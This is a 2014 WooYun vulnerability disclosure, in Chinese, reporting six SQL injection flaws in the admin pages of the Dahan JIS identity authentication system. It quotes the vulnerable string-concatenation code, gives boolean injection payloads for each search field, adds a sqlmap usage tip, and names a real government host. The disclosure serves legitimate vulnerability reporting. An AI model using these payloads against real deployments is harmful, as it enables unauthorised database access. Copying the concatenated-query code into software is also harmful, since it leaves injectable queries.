当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-049904

漏洞标题:大汉版通JIS统一身份认证系统系统多处SQL注入

相关厂商:南京大汉网络有限公司

漏洞作者: wefgod

提交时间:2014-01-27 09:36

修复时间:2014-04-27 09:37

公开时间:2014-04-27 09:37

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-01-27: 细节已通知厂商并且等待厂商处理中
2014-01-27: 厂商已经确认,细节仅向厂商公开
2014-01-30: 细节向第三方安全合作伙伴开放
2014-03-23: 细节向核心白帽子及相关领域专家公开
2014-04-02: 细节向普通白帽子公开
2014-04-12: 细节向实习白帽子公开
2014-04-27: 细节向公众公开

简要描述:

只是冲着数量来的。后台SQL注入,有点怀疑是实习程序员……临时工的作品?

详细说明:

后台SQL1
第一个先拿一个麻烦一点的来演示,后面的同理
需要有应用管理员或者系统管理员的权限登录。
/jis/manage/datasbase/que_datasbase.jsp

if (que_keywords.length() > 0) {
strSqlCondition.append(" AND vc_collocatename like '%" + que_keywords
+ "%'");
}


为了配合工具利用,需要先新增监听管理:
http://management.ysx.gov.cn/jis/manage/datasbase/opr_datasbase.jsp?fn_billstatus=A&

image025.png


只要是公网可以访问的IP,而且用户名、密码是对的就行了。否则会提示无法连接之类的

image027.png


添加了之后就有作为标识用的字符串出来了
在搜索框内输入' and '%'='
页面没有变化

image029.png


输入' and '1'=',页面变化了

image031.png


带上cookie丢工具吧
Sqlmap配置data的时候这样来比较好:--data "que_keywords=' * and '%'='"

image033.png


image035.png


后台SQL2
jis/manage/app/que_application.jsp

if (que_keywords.length() > 0) {
strSqlCondition.append(" AND vc_appname LIKE '%" + que_keywords+ "%' OR vc_appmark LIKE '%"
+ que_keywords+ "%'");
}


权限要求同上
照旧,搜索处输入' and '%'='

image037.png


' and '1'='

image039.png


工具利用方法类似上一个。
后台SQL3
jis/sys/user/que_userginfo.jsp
类似上两个漏洞

if(que_keywords.length()>0)
strSqlCondition.append(" AND vc_usergroupname like '%"+que_keywords+
"%' OR vc_groupallname like '%"+que_keywords+"%'");


搜索输入
' and '%'='
搜索出所有结果:

image041.png

漏洞证明:

后台SQL4
jis/manage/role/que_approleinfo.jsp

if(que_keywords.length()>0) {
strSqlCondition.append(" AND vc_rolename like '%"+que_keywords+"%'");
}
if(que_webid.length()>0) {
strSqlCondition.append(" AND i_webid = '"+que_webid+"'");
}


输入' and '%'='

image043.png


' and '%'='1

image045.png


后台SQL5
jis/manage/log/que_log.jsp

if(que_keywords.length()>0){
strSqlCondition.append(" AND vc_operatecontent like '%"+que_keywords+"%' OR c_userid like '%"+que_keywords+"%' OR vc_modulename like '%"+que_keywords+"%' OR vc_state like '%"+que_keywords+"%' ");
}


搜索输入
admin%' or '%'='
出来全部结果:

image047.png


改为admin%' and '%'='
则只出现admin的日志:

image049.png


后台SQL6
jis/manage/sysview/que_sysview.jsp
输入fgj' or '%'='

image051.png

修复方案:

厂商结合实际看吧

版权声明:转载请注明来源 wefgod@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-01-27 16:27

厂商回复:

非常感谢您对大汉产品的关注以及对产品安全方面的指正,问题已跟进处理

最新状态:

暂无